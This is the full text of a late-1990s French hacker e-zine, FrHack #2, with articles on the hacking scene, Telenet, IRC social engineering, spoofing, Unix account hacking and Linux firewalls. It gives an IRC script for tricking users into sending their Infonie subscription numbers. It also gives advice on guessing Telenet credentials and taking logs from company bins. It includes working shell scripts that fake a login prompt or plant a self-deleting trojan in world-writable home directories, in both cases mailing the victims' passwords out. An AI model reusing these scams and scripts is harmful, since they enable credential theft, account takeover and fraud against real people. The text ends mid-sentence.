FRHACK # 2 _________ ________ (_________)) (________)) (___________)) (_____)) (_)) (_____))____ (_____))__(_)) ___ ___ (___________)) (__________)) (___) (___) (_____)) (_____)) (_)) (___)___ _______ ______ (___)___ (_____)) (_____)) (_)) (_______)(_______)( ____)(_______) (_____)) (_____)) (_)) (___) (_)(___)(__)( (____ (___()__) (_____)) (_____)) (_)) (___) (_)(_______)(______)(___) (_) _ _____ ___ ___ _____ ______ ____ __ (_) ____ ( __) ( _)(_ ) ( _ ) ( ___) ( _ ) ( ) / _ | ) (__ __ )( \/ ) ) ) (_) ( ) ( __ )( (_) )( / // | ( __)(__)( ) ( ) ( (---) ) ( ) ) _) ( ) (_)( ) /_// / ) (__ )( )( )( )( ) (__( ) )( ( ))( / /__ (_____) (__) (__) (__) (__) (_______) (__) (___) /______\ Irc: Undernet #hack.fr Web: www.frhack.org -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Disclamer L'‚quipe de FrHack offre … votre disponibilit‚ un Emag. Ce Emag n'a pour but que d'inform‚ donc nous ne sommes nullement responsables des pertes de donn‚es informatiques que ces informations pouraient occasionnellement caus‚es, bien ou mal utilis‚es. Vous introduire sans autorisation dans un autre systeme informatique, changer de quelques manieres que ce soit les fichier que le systeme contient, est totalement ill‚gal, que vous le fassiez consciament ou non. Biens–r les textes comprient dans ce Emag peuvent vous montrer … rentrer sur un ordinateur, mais vous devez vous servir de ces textes que pour vous amusez, et combler votre soif de savoir jusqu'au prochain Emag. galement, aucun des r‚dacteurs de FrHack ne peut ˆtre blƒmer des dommages caus‚s, accidentelement ou non, … un ordinateur grƒce … son article. De plus, FrHack s'engage … vous fournir le moins possible d'informations erron‚es. Si vous trouvez une informations erron‚es dans les textes qui suivent ce disclamer, dites-vous que l'erreure est humaine, et veuillez nous faire part de cette information fauss‚e. Le contenu de ce Emag n'est pas decern‚ aux personnes suivantes. Personne travaillant pour le gouvernement, policier, personne travaillant pour un partie politique ou une agence gouvernementale . En continuant … lire ce Emag, vous agr‚ez entierement … tout ce qui a ‚t‚ ‚nonc‚ ci-dessus et vous vous engagez … ne pas utiliser les informations contenues dans ce Emag de quelque maniere que ce soit ou qui pourrait entrer en conflit avec la loi. L'‚quipe de FrHack vous souhaite une bonne lecture, et espere que vous apr‚cierez notre Emag. L'‚quipe de FrHack -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sommaire Article Auteur Underground kthulu Telenet Snowcrach Acompte FT gratuit Dr_JI Spoofing Walla Hacking de compte Unix Snowcrach Firewall et Proxy Snowcrach Peroxyde d'acetone _Franck Trojan Bismuth Port Linux Khanabyss Server SMTP Langly Slogan FrHack WeaponX boxe Snowcrach Password Linux Oktober Resetter des Password NuClEaR Configuration de souris sous X Oktober Conclusion Snowcrach -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Underground Ici vous ne trouverez pas d'informations techniques mais juste un petit d‚lire sur la fa‡on dont je con‡ois la scŠne fran‡aise. Pour commencer, je veux insister sur les difficult‚es que j'ai eu au d‚but, je tenterais d'analyser dans une seconde partie pourquoi la scŠne fran‡aise est aussi peu d‚vellop‚e et pour terminer je tenterais de donner quelques bons conseils et liens pour ceux qui d‚butent. Je ne suis pas un dieu en informatique mais en livrant ma propre exp‚rience je pense que ‡a aidera les newbies ! Pour toutes remarques, d‚saccord ou au contraire encouragement, n'h‚sitez pas … m'envoyer un mail, je tacherais d'y r‚pondre soit en priv‚ soit par un article ici mˆme. Vous pouvez aussi me retrouver sur irc UnderNet … #hack.fr. Le difficile passage de la larve … l'‚tat de jeune papillon ! En fait tout commence avec la d‚couverte d'irc ! On se fait des cybers amis et rapidement on apprend les mots de LaMeR, newbie ou autres choses d‚sagr‚ables et qui blessent notre amour propre et on se dit : "et pourquoi je ne sortirais pas de mon cocon moi aussi ?" A partir de l…, on d‚couvre l'underground, j'ai de suite ‚tait passionn‚ par ce milieux de gens tr‚s secrets et avares de conseils. C'est donc tout naturellement que j'ai voulu devenir moi aussi un "HaCkEr", mais le chemin qui mˆne de jeune internaute … "hacker" est long et sem‚ d'emb–ches !. j'ai commenc‚ par me rendre sur des channels de hack, mais j'ai rapidement ‚t‚ d‚‡u par le comportement des personnes pr‚sentes sur ce genre de channel. En effet lorsque je posais des questions, il n'y en avait pas un seul pour me r‚pondre o— alors je me faisais simplement kick‚ et bannir du channel (je ne citerais pas les noms). j'ai gal‚r‚ comme ‡a de d‚ceptions en d‚ceptions jusqu'… ce qu'un jour, on m'a conseill‚ de lire les noroutes. Une petite recherche sur "hack" … aboutie au t‚l‚chargement de ces e-mags. Et l…, h“ joie, h“ bonheur, j'ai enfin d‚couvert des r‚ponses … mes questions ! Tr‚s vite, ces e-mags devinrent mais livres de chevets. C'est fou tout ce qu'on peux apprendre l… dedans . Les profs oublient un peu trop de choses quand ils font leur cours sur tcp/ip ou autres protocoles. Dans ce genre de magazines, j'y ai aussi appris pourquoi les hackers ‚taient aussi peu bavard. C'est en gros, les difficult‚es majeures que j'ai eu au d‚but (comme beaucoup je suppose). Bien s–r, s'ajoute les difficult‚es de compr‚hension. NFS, TCP/IP, showmount -e, root, dnsquery, nslookup ... sont des mots bien barbares au d‚buts, mais vous verrez, … force de pratique et de travail on finis par saisir ! Par ce petit paragraphe, je lance un cri de d‚tresse au hackers "confirm‚s" : les gars il serait sympa de prendre un newbie sous notre aile et l'aider … se faire un place parmis nous au lieu de nous lamenter sans arrˆt sur le develloppement de la scŠne fran‡aise. Pour les newbies, comprenez juste qu'ils vous faut insister pour tirez des infos au vieux loups ! Pourquoi tant de haine ? Je me demandais pourquoi la scŠne fran‡aise ‚tait aussi peu d‚vellop‚e et aussi peu active. J'ai deux r‚ponses … proposer : * la premiŠre * Je pense que comme vu dans le paragraphe du dessus, cela vient du fait qu'on a pas envie, ou pas le temps de r‚pondre aux questions des jeunes qui d‚butent, notre attitude doit en d‚courager plus d'un. il est clair qu'on ne peux pas d‚voiller notre activit‚ et nos connaissances au premier venu sur un channel irc. Il vaut savoir que les V trainent eux aussi sur les channels de hack dans l'espoir que nous nous d‚couvrions, il est donc l‚gitime de ne pas avoir envie de r‚pondre quand LaMer nous demande : "Tu as d‚j… hack‚ un serveur politique ?" Il est clair qu'on ne peux pas savoir si c'est un "jeune" qui veux se lancer ou si c'est un V qui cherche le mec qui s'est fait le serveur du PCF (mouahahahahaha) ! Le problŠme et donc de savoir si on peux faire confiance ou non … ce gus ! moi je pense que du moment qu'on ne donne aucune informations personnelles, on peux r‚pondre … LaMer. Bon ce qui est sao–lant , c'est aussi le gars qui croit que le hack consiste … envoyer une s‚rie de nuke pour prouver sa sup‚riorit‚, je trouve qu'il n'y a rien de plus aga‡ant que de voir s'afficher sur mon ‚cran : "Nuke detect from : XXX.XXX.XXX.XX" le pire c'est que le gus est sous loOzedaube et il croit planter mon shell unix (bon courage !) et que quand on s'interesse de plus pr‚s … sa machine, il a l'option : "ressources partg‚es" qui est valid‚e ! ;) mais bon il faut aussi les comprendre c'est pas ‚vident de se faire remarquer pour que quelqu'un daigne nous r‚pondre. Il est tr‚s fr‚quent de lire dans la presse des articles sur des pirates informatiques qui se sont fait arrˆter ! On a pas trop envie de se faire "buster" donc on parle au moins de gens possible et en tout cas on parle jamais de nos r‚sussites ou ‚checs. Pourtant quelle protection on se ferait si on disait : ok les gars, je suis rentrer sur www.victime.com par telles m‚thodes allez y. Imaginez un peu la tronche du rewt qui le lendemain matin verrait 50 ou 60 intrusions sur son systŠme ? Et en plus, aucune intrusion venant du mˆme endroit ! je peux vous garantir que le gars il cherchera mˆme pas … savoir si c'est un seul hacker qui a utilis‚ 60 rebonds (que celui qui a 60 rebonds me fasse signe) ou si c'est 60 hackers diff‚rents ! En plus l'union fait la force dans tous les mecs qui rentrent et qui essaye d'effacer leur traces, y en a un de plus malin que les autres pour ce genre de boulot alors si il pouvait penser aux copains qui sont rentr‚s avant ‡a aiderait aussi. Bien sur il y a un problŠme d'‚thique : je suis sur le serveur qu'est ce que je fais ? ceux qui r‚pondent :"je le crushe" peuvent partir de suite et inutile de revenir. C'est … cause d'attaques trop bourrines ou qui entrent trop dans la vie priv‚e des gens que les hackers sont diabolis‚s et d‚sign‚s comme les ennemis publics num‚ro 1 du 21ø siŠcle. Grosso merdum je dirais que la scŠne fran‡aise n'est pas bien devellop‚e a cause des encu*** qui font du crushing et par la mˆme transorment les gentils hackers (mouahahahaha) en vilain pirates. MESSIEURS DE LA DST : NOUS NE SOMMES PAS DES MEURTRIERS ! NOUS SOMMES JUSTE DES PASSIONNES DE SECURITE RESEAU !!!!!!! * La deuxiŠme * Heuuuuuuu ... ben heu ..... en fait ... je sais plus .... ! envoyer moi votre avis, je le mettrais l… ! Deux trois conseils pour les newbies Ben en fait : quand vous debarquez sur des channels de hack sur irc, arretez de faire les trisomiques et surtout ne croyez pas que le hack c'est facile. Un moteur de recherche sympa (mais tout en anglais) : Altalavista … http://194.1.128.27. Un regroupement de petits progs pour unix aussi bien que pour loOzeDaube : http://www.rootshell.com Un site ou on trouve de tout mais en anglais : http://www.elitehackers.com Sur irc : UnderNet : #hack.fr Merci de m'avoir lu bon courage pour les nouveaux sur la scŠne et bonne continuation aux vieux loups ! Que vous soyez newbies ou vieux loups maillez moi, j'ai besoin de vos conseils ! The FrHack Crew Kthulu -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Telenet Pr‚face Dans ce texte, je vais tent‚ de vous expliquer le principe de Telenet. Souvent m‚langer avec Telnet, ce petit programme devrait ˆtre connu de tous les pirateurs informatiques. Telenet Premierement vous devez trouver un port telenet. 1-800-compagnie-prete-a-se-faire-hacker 1-800-hackermoi Faite lui une session telenet avec le mode 'No Echo'. Ca devrait ressembler … ‡a. Telenet 313 19A TERMINAL= Quand vous aller voir le 'prompt' TERMINAL=, taper D1 ou A1. Le systeme devrait repondre: @ Vous devrez maintenant taper soit 'C 313 160' ou 'C 312 160'. Cela va imprimer des caractŠres double depuis que vous vous etes mit en mode 'No Echo'. Votre ‚cran devrait afficher: Telenet 313 19A TERMINAL=AA22 @CC 331133 116600 313 160 CONNECTED PASSWORD XXXXXXXXXXXXX IIIIIIIIIIIIIIIIIIIIIIIIIIIII HHHHHHHHHHHHH Passwords Meme si le 'Mask' de password est de 12 caractŠres, ceux-ci seront seulement de 9 caractŠres. Le format est le suivant. N,LNNNNNN Le chiffre N signifie num‚rique et le signe L signifie Alphab‚tique. La plupart des passwords sont configur‚s comme ceci: 9,XNNNNNN Ceux des magasins seront: 8,XNNNNNN Je doit ˆtre clair, vos chance de trouver le password sont de une sur un milion. Pour hacker le password, je vous montrerai plus tard. Maintenant, si votre password est bon ou non, vous verez ceci: Port = $X25G00 #VC03 ON AT 22:40 CT, 15 DEC 1998 UserID: ? UserID Le format du UserID est facilement configurer. La plupart d'entre eux seront: MS<4 DIGIT STORE NUMBER><2 DIGIT USER NUMBER> Le User Number commence … 01 et vas jusqu'… 99, meme si normalement 99 est rarement choisi.Le Store number User ID devrait etre 'MM' au lieu de 'MS' normalement. Ca devrait etre: MM<4DIGIT STORE NUMBER>01 Pour avoir le num‚ro du magasin(Store number) vous n'avez qu'… apeler au magasin. Celui de Cogeco … Trois-RiviŠres est 7025. Le Manager ID devrait etre: MM702501 Un autre ID pourrait etre: MS702501 Normalement, lorsque l'entrepreneur du systeme as fini de se loguer, le systeme envoie les fichiers logs par imprimante, ce dernier les jetent dans les poubelles de l'entreprise. Vous n'aurez qu'… aller les chercher et vous aurez les password cl‚ pour hacker le systeme. Programme Quand tu as le bon User ID et le bon Pasword, et que tu les as rentrer, ca devrait resembler a ceci: Cogeco Cable LAST LOG-ON AT 22:54 CT, 14 DEC 1998 Programme Voici quelques programmes avalables: PNL, TIM, OPR, CHG PAY, PAYROLL, CHG CREW, CASH, DLEGER, BYE, MEET, ACV, BJOB, MAL, RELEASE CREW REQUEST? TERM=TERMINATE (FIRE A CREW MEMBER) Entrer '4' pour un term code NEW= Ajouter un nouveau membre pour la job title code 660 Le reste du systeme va etre dif‚rent pour chaque, vous devrez vous debrouiller seul. Le programme 'MEET' devrait etre trŠs utile en vous donnant tous les num‚ros de carte de cr‚dits des personnes qui travaillent pour l'entreprise. The FrHack Crew Snowcrash -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Acompte FT gratuit Qu'est-ce que ISE? C'est l'Internet Social engeneering. L'art du social engeneering apliqu‚ … internet en mot clair. En fait aujourd'hui je vais vous faire part de quelque chose ma fois fort facile et malgr‚ extremement utile . Mini-Howto sur comment je fais pour avoir une connexion Infonie : Plusieurs solutions : 1) Tu payes, c'est pas trop dur (mais cher) 2) Tu demandes … un ami de t'h‚berg‚. 3) Tu trouves un moyen de te connect‚ sur le compte de quelqu'un d'autre . C'est cela qui nous int‚rresse. Pour se connecte … Infonie la seule chose dont on a besoin c'est d'un num‚ro d'abonnement . Comment trouve des num‚ros d'abonnements Le num‚ro d'abonement est contenu dans le fichier infonie.ini. Ce dernier ce trouve dans le r‚pertoire C:\Windows . On peut toujours demander … quelqu'un de nous l'envoyer, mais la subtilit‚, ca compte. C'est la que le social engeneering commence. Primo : Savoir ou trouver la victime Je pense que l'IRC est vraiment une cible de choix donc on se connecte sur IRC et on se rends (ss un faux pseudo qui fait vraiment newbie ) dans un chan qui regroupe des bouffons de chez infonie (‚viter les vrai channel de hack car sa marchera pas ...) Secondo : Savoir qui choisr comme victime Vous etes sur un chan comme #warez-france. Chercher des mecs d'infonie qui ne sont pas op ensuite faite leurs un query et commencer la discution avec ce monsieur. Tertio : L'art de l'embrouille en quelques lecons 1ere lecon : Qand tu ecris au mec ecrit toujours tout,pas d'abreviations ni de smileys, ‚vite les fautes d'ortographes. 1ere bis : Repond lentement pour faire voir que tu n'es pas habitu‚ … taper sur un clavier . 2eme lecon : tale ton ignorance, fait lui sentir qu'il est un dieu du net par rapport … toi. 3eme lecon : Apres avoir bien noyer le poisson, tu lui demande son infonie.ini sous une excuse bidon (moi perso j'aime bien les embrouller avec un truc du style "mon internet explorer refuse de se lancer les mecs du services clients m'ont dit que sa venait de mon infonie.ini qui est merdique tu peux m'envoyer le tien ?" 4eme lecon : Qand tu l'as remercie le ,salut le et casse toi mais surout NE LUI DIT PAS QUE TU L'AS NIKE (le moins ils en savent, le mieux c'est. ) Reste plus qu'… te connect‚ avec son num‚ro d'abonnement. (c'est le truc … 15 chiffres quii commence par 199 dans le fichier). The FrHack Crew Dr_JI -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Spoofing Salut Chers Amis Je me presente, je m'appelle WaLLa et je vous explique comment faire pour spoofer votre adresse et ip , cela est trŠs facile quand vous avez deja un Ip qui a le port 23 d'ouvert . J'explique si vous n'avez pas de Ip avec le port 23 d'ouvert ... par exemple si vous voulez que votre adresse finisse par videotron.net cela est tres simple vous prenez l'ip de quelqu'un qui a cette adresse et vous la scanner a l'aider de scan wingate (tres facile a trouver sur le web faites une recherche sur yahoo vous allez vite trouver !) Bon voila je crois avoir ‚t‚ assez precis si vous avez des questions tout … la fin de ce texte il y a mes coordonn‚s !! contactez moi si vous vous en sortez pas !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ================================================== ================================================== /server 23 /raw /raw nick /raw user * * : ================================================== ================================================== /server ip 23 /raw newbrunswick.nj.us.undernet.org 6664 /raw nick WaLLa /raw user HONDA * * :Z_RuLeZ ================================================== ================================================== Les Servers: ================================================== ================================================== /raw StLouis.MO.US.UnderNet.org 6667 /raw montreal.qu.ca.undernet.org 6667 /raw lulea.se.eu.undernet.org 6667,7000 /raw diemen.nl.eu.undernet.org 6667,6668,6669 /raw caen.fr.eu.undernet.org 6667,6668 /raw amsterdam.nl.eu.undernet.org 6667,6668 /raw panoramix.umh.ac.be 6667 /raw irc.belnet.be 6667 The FrHack Crew Walla WaLLaRoo99@Hotmail.com -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Hacking de compte Unix Pr‚face Dans ce texte, je vais tenter de vous expliquer comment hacker un acompte Unix. Cela ne vous permeteras pas de hacker le 'root' alors ne vous faites pas d'id‚e. Le Fake Login Cette maniere est trŠs simple, mais ne marche que neuf fois sur 10. Cela depends toujours du niveau de comp‚tence des utilisateurs et de l'administrateur de la Box. Si vous avez affaire … de vrais d‚butants , vos chance de r‚ussite sont de deux cents pour cent. Le principe est simple. Sous Unix chaque connexion utilise un terminal qui est en fait un fichier dans le rep '/dev'. Chaque telnet lanc‚ va utiliser un de ces fichier ttyXX (XX= numero du terminal). Faites un 'who' ce qui va lister les utilisateurs connect‚s avec leur num‚ro de terminal. % who [user] [tty] [tmps de connexion] ----- ----- ---------- user1 tty00 12:22 user2 tty01 00:44 user3 tty12 05:14 user4 tty08 01:00 Voici le resultat d'une commande 'who'. On voit bien que chaque user utilise un terminal sp‚cifique (user1 utilise le tty00) hors, chacun de ces terminaux est en fait un fichier /dev/ttyXX, ainsi vous pouvez ‚crire sur ces fichiers ce qui s'affichera directement sur l'‚cran du user qui utilise ce terminal. Voici donc ce que nous allons faire. On va executer un script shell qui simule un Reboot du serveur et demandera … l'utilisateur son Login et Password … nouveau. Voici le script … r‚alis‚. #~/fakelogin.sh # Ca doit ressembler au reboot du Server echo "Broadcast message from root...." echo " " echo "Digital UNIX (machine.server.fr) (tty00)" echo " " echo "login: \c" read lgin echo off echo "Password: \c" read pw echo " " echo on # (Votre mail) echo "Login: $lgin - Pword: $pw" | mail (votre mail) # fin du script Maintenant, copier ce script dans un fichier fakelogin.sh (placer dans vote homedir). Il vous suffira de faire en sorte que ce script ressemble … votre Login et de mettre votre email puis de tapez: % cat fakelogin.sh >/dev/ttyXX (remplacer ttyXX par le terminal … hacker). Ensuite vous aller recevoir un email vous indiquant le login et le mot de passe de l'utilisateur. Le fichier Password videment le plus simple pour hacker une machine Unix est de lire directement tous les mots de passes la o— ils sont ‚crit (c'est … dire dans /etc/passwd) mais la plus part du temp vous imaginez bien que l'admin ne laisse pas ce fichier en lecture. Ou il est encode . Donc vous pouvez toujours essayer: % cat /etc/passwd | more Ca m'etonnerai que ca marche ou alors c'est que vous avez de la chance . Attention aux fausses joies car bien souvent le fichier passwd est encode. C'est … dire que le fichier peut ˆtre lu mais les mots de pass sont remplaces par des '*' et les vrais pass sont dans un autre fichier qui lui n'est lisible que par le root. Permission sur les HomeDir Pourquoi ne pas profiter de l'oubli d'un utilisateur pour lui hacker son compte. Aller dans le repetoir des /usr et tapez: % ls -l | more Ce qui listera tous les comptes avec les permissions: Rappel: les permissions sur unix se font de la maniere suivante: r = read w = write x = execute -rwxr-xr-x signifie: -rwx (owner) r-x (group) r-x (all). Soit que ce fichier est en lecture/ecritur/exec pour le propri‚taire et en lectur/exec pour les autres. Si il y a un 'd' devant cela signifie qu'il s'agit d'un repetoire. bon voici un exemple de resultat affiche apres un 'ls -l' dans /usr [permissions][user][date] [size] ------------ ---- ---- ----- drwxr-xr-x bob 1998 21 drwxr-xr-x bill 1998 11 drwxr-xr-x Zoe 1997 05 drwxrwxrwx fila667 1998 32 drwxr-xr-x Monic 1997 29 On voit que le homedir de fila667 est en drwxrwxrwx c'est … dire que vous pouvez non seulement le lire mais aussi y ‚cire. Si vous ˆtes chanceux, L'utilisateur Fila667 auras laiss‚ son repertoire en mode ‚criture. Vous pouvez donc installer tranquillement un petit script dans le repertoire de fila667 de maniere … ce que celui ci l'‚xecute et vous donne son mot de passe. Sachez faire en sorte que fila667 ‚xecute ce script et aussi qu'il ne se rende pas compte qu'il est en train de lancer de lui meme un cheval de troie. Le mieux serait de mettre un proc‚der d'auto-destruction pour ne laisser aucune trace. Voici un exemple de script … placer dans le repertoire de Fila667. #!/usr/homedir/SECURITY echo " " echo " SECURITY DAEMON " echo " " echo " The security Daemon has locate that your " echo " password is unsecure please change it now!" echo " " echo "old Password: \c" read pw echo " " echo "New Password: \c" echo " " echo "Thank you " echo on # (votre email) echo "Pword: $pw" | mail (votre email) # efface le script rm -f SECURITY # fin du script Une fois que vous avez configurer ce script copier le chez fila667 et rendez le executable: % cp SECURITY /usr/fila667 % chmod u+x /usr/fila667/SECURITY Et voila le pauvre fila667 une fois de plus en croyant bien faire c'est fait voler son mot de passe. The FrHack Crew Snowcrach -=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Firewall et Proxy Pr‚face Dans ce texte, je vais tenter de vous expliquer le fonctionnement des firewalls. Ils servent … deux choses. Prot‚ger le reseau interne contre les tentatives d'intruision venant de l'ext‚rieur. Le principe du Firewall est trŠs simple.A l'origine un firewall est un systŠme comportant deux interfaces r‚seau. Pour la suite on prendra le premier cas , celui ou l'on souhaite prot‚ger tout le r‚seau local. On a en fait une interface interne reli‚e au r‚seau local et une interface externe reli‚e … Internet. L'ordinateur firewall peut atteindre … la fois le r‚seau prot‚g‚ et Internet. Le r‚seau protŠge ne peut atteindre Internet et Internet ne peut toucher le r‚seau protŠge. Firewall et Routeur IP Le routeur prend en charge les paquets jusqu'… la couche IP. Le routeur transmet chaque paquet en fonction de l'adresse de destination du paquet et de la route vers la destination pr‚cis‚e dans la table de routage. Par contre le firewall ne transmet pas les paquets. Le pare-feu accepte les paquets et les prend en charge jusqu'… la couche application. Types de Firewalls Filtres de paquets Un firewall de ce type inspecte tous les paquets qu'il recoie et regarde s'ils correspondent aux rŠgles pr‚alablement ‚tablis. S'il respecte les rŠgles il est accept‚, sinon il est rejet‚. Les critŠres des rŠgles peuvent ˆtre par exemple l'adresse IP, les ports sources et destination contenu dans les paquets. Les Proxy Lorsqu'un firewall de type proxy est utilis‚ sur un r‚seau, il n'y a aucune connexion directe entre les systŠmes du r‚seau local et le r‚seau Internet. Les machines internes se connectent en fait au firewall pour lui demander un service. AprŠs le FW se charge de relayer la requˆte au serveur Internet puis de renvoyer la r‚ponse au client interne. Filtres de paquets La technologie de filtre de paquets est incluse dans le noyau de Linux . Le filtre doit agir dans la pile IP du systŠme . Pour utiliser cette technique vous allez devoir une fois de plus recompiler le noyau et r‚pondre YES aux questions suivantes: IP: forwarding/gatewaying (CONFIG_IP_FORWARD) YES IP: firewalling (CONFIG_IP_FIREWALL) YES IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) YES Le noyau compil‚ , install‚ , red‚marr‚ vous allez ˆtre en mesure de configur‚ le FW. Pour cela on va utilis‚ ipfadm . La syntaxe g‚n‚rale est: ipfwadm-A commande paramŠtres [options] ipfwadm -I commande paramŠtres [options] ipfwadm -O commande paramŠtres [options] ipfwadm -F commande paramŠtres [options] ipfwadm -M [-l ou -s] [options] Comme vous venez de le voir il y a cinq cat‚gories: -A configuration de l'accounting (compatibit‚ des paquets atteignant le systŠme) . -I rŠgles … appliquer aux paquets TCP/IP en entr‚e . -O rŠgles … appliquer aux paquets TCP/IP en sortie . -F rŠgles … appliquer aux paquets TCP/IP … router d'une interface … une autre . -M administration de l'IP Masquerading. Perso je pourrais vous parler que des categories I , O , F , M. ipfwadm possŠde de trŠs nombreuses options que je vais pas d‚crire ici par ce j'ai pas envie. Lisez la doc Linux . Avant de cr‚er toute rŠgles de filtre IP , vas falloir d‚finir des rŠgles de s‚curit‚ . Par exemple pour ma machine on va dire: Toute connexion du r‚seau internet vers une machine interne est interdite . De ext‚rieur , on doit avoir accŠs au serveur de messagerie et au service DNS du firewall . On va dire qu'on a un r‚seau interne de type 193.1.1.0/24 et qu'on est reli‚ … un sous r‚seau de type 193.1.2.0/24 (entre le FW et le routeur) . Le FW ayant pour adresse 193.1.1.254 en interne (eth0) et 193.1.2.1 en externe (eth1) . Je vais maintenant dire quelques uns des filtres que j'applique -ipfwadm -O -p accept La rŠgle par d‚faut des paquets en sortie est accept (-p repr‚sente l'action par d‚faut) - ipfwadm -I -p deny La rŠgle par d‚faut des paquets en entr‚e est deny . -ipfwadm -F -p deny La rŠgle par d‚faut des paquets … router en entr‚e est deny . -ipfwadm -F -a accept -S 193.1.1.0/24 -D0/0 -P tcp Autorisation pour router tous les paquets TCP provenant de l'ext‚rieur . -ipfwadm -I -a deny -S 193.1.1.0/24 -D0/0 -W eth1 Cette commande sert … lutter contre le SPOOFING (changer son adresse IP) en effet cette rŠgle dit que tous les paquets qui rentrent dans le sous r‚seau s‚curis‚ et qui ont une adresse source correspondant … une adresse du sous r‚seau (ce qui n'est pas logique) doivent ˆtre rejet‚! -ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 53 -ipfawadm -I -a accept -P tcp -S0/0 -D 193.2.1.1 53 Ces mesures disent que les accŠs au serveur DNS (port 53) sont accessible de n'importe o— . -ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 25 AccŠs au serveur SMTP du firewall de n'importe o— . Malheureusement on retrouve l… le plus grand inconvenient des FW . En effet dans l'‚tat actuelle systŠme on ne pourra pas faire fonctionner un client FTP du r‚seau interne avec un serveur situ‚ … l'ext‚rieur . Le protocole FTP pr‚voit l'‚tablissement d'une connexion du serveur FTP vers le client (du port 20 -> port > 1024) Mais il y a des solutions . - Utiliser le client FTP en mode passif (A ce moment le client ‚tablit une connexion vers le serveur ftp) - Utiliser un proxy(voir section suivante) install‚ sur le FW qui relaiera les requˆtes de l'int‚rieur vers ext‚rieur . - Utiliser l'IP masquerading . - Ou alors rajouter cette rŠgle ipfwadm -F -a accept -P tcp -S0/0 20 -D 193.1.1.0/24 1024-65535 Remarque int‚ressante: Si vous tombez sur un systŠme avec une rŠgle de ce type , vous pouvez en profitez , en effet cette rŠgle expose les services du r‚seau interne qui ‚coutent sur un port >1024 . A partir de la vous avez plus qu'a fait partir un paquet du port 20 de votre machine vers un service . Beaucoup de services tournent sur ce port . Par exemple pour sur les ports 6000vous avez les services X-Windows . S'ils n'ont pas ete protege correctement vous pouvez voir ce que fait l'utilisateur. Vous pouvez memes voir les toubhes frappees , les programmes lancees. Si vous faites telnet dessus vous aurez je pense l'effet d'un denial of service; l'ecran va se geler , le sys va ralentir ... Mais il y a plus mieux. Si vous vous y connaissez un peu en programmation utilisez la fonction XOpenDisplay() , si la fonction retourne NULL alors c'est securise sinon ... char *hostname; if (XOpenDisplay(hostname) == NULL) { printf("Loupe : %s\n", hostname); } else { printf("Ca marche : %s\n", hostname); } Il y a a autre chose auquel il faut penser . Normalement la route qu'emprunte un paquet de sa source … sa destination est determinee par les routeurs qui se trouvent entre eux. En fonction de l'adresse de destination et de leur table les routeurs se chargent de dirigier les paquets . Mais dans une trame TCP/IP, il y a une option qui porte le nom de ®source routing¯ qui est peu utilisee. En fait on l'utilise dans le debuggage des reseaux pour trouver les problŠmes. Le truc c'est que si vous envoyez un paquet en faisant croire qu'il vient de l'interieur, normalement les routeurs ne devrait pas l'ammener au FW mais le probleme la c'est qu'ils le font avec cette option. En plus c'est pas dificile a faire. Mais normalement il y a des options pour desactiver le ®source routing¯ . Masquerading C'est une technique de plus en plus utilis‚e . Elle consiste … masquer totalement l'adressage IP du r‚seau interne ( On peut donc utiliser des adresses IP priv‚es ) . Ainsi chaque paquet qui traverse le firewall est modifi‚ pour faire croire qu'il n'y a qu'un seul systŠme connect‚ . Tout le r‚seau interne partage ainsi l'adresse IP (externe) du FW . Installation: Bon beh va falloir recompiler le noyau et r‚pondre YES aux questions: IP: forwarding/gatewaying (CONFIG_IP_FORWARD) IP: firewalling (CONFIG_IP_FIREWALL) IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) IP: masquerading (CONFIG_IP_MASQUERADE) IP: ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP) Maintenant vous allez ˆtre en mesure d'utiliser une autre des 5 options d'ipfwadm: l'option -M . Pour cela utiliser l'option -l qui liste les connexions qui utilisent l'IP masquerading et -s qui fixe le timeout . Pour autoriser le masquerading il faudra les rŠgles suivantes - ipfwadm -F -p deny - ipfwadm -F -a masquerade -S 192.10.10.0/24 -D0/0 Les Proxy D'aprŠs ce que j'ai lu et ce qu'on m'a dit la meilleure solution pour utiliser une machine Linux en proxy consiste … utiliser l'ensemble d'outils qu'offre TIS . Ils fournissent un package connu sous le nom de FW toolkit . Vous pouvez le telecharger sur le site Web de TIS http://www.tis.com/docs/products/fwtk/index.html Installation Bon comme vous allez ˆtre un Proxy , il va falloir forcement d‚sactiver la fonction de routeur de Linux . Pour cela on recompile le noyau en r‚pondant NO au forwarding/gatewaying (CONFIG_IP_FORWARDING) . Vous ˆtes pas oblig‚ de mettre cette option mais si vous ne le faites pas les machines du r‚seau interne seraient directement accessibles de l'ext‚rieur … travers les possibilit‚s du FW . Si l'IP forwarding est laisse , alors la il y a une faille mais la je connais pas du tout ,en fait la solution serait de downer le firewall , ainsi le FW ne marcherait plus mais le noyau lui continuerait a router les paquets sans suivre les rŠgles! Pour ‡a , il y a des solutions diverses et pas trŠs gentilles comme le SYN flooding et autres attaques barbares . Bon vous compilez les outils TIS en suivant les instructions . Configuration La table netperm r‚side dans le fichier /usr/local/etc/netprem-table . Cette table d‚crit la configuration principale de tous les composants du Trusted Firewall Toolkit . Quand une des applications est lanc‚e elle va chercher sa config dans cette table Description -Netacl: Cette application permet de donner l'accŠs aux diff‚rents services TCP . Ce programme se d‚marre depuis le super-d‚mon inetd . Si par exemple on ajoute au fichier 